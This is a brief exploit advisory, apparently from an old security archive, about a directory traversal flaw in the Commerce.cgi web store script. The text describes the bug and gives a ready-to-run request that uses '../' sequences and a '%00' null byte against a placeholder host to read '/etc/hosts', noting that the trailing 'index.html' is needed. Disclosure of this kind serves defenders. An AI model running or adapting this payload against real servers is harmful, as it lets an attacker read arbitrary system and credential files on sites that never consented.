Name   : Commerce.cgi Directory Traversal
About  : Commerce.cgi can have your store's catalog up
         and running on the web in literally a couple
         of hours. The easy to use Store Manager will
         even allow you to add and remove products from
         your inventory right through your web browser.
         Best of all, it's free, vulnerable & open source. 
Problem: Adding the string "/../%00" infront of a webpage 
         document will allow an remote attacker to be able
         to view any files on the server

Exploit:

lynx http://VULNERABLE.com/cgi/commerce.cgi?page=../../../../etc/hosts%00index.html
(take note of the the "index.html" being added, it needs that)
                                  by: slipy (slipy@b10z.net)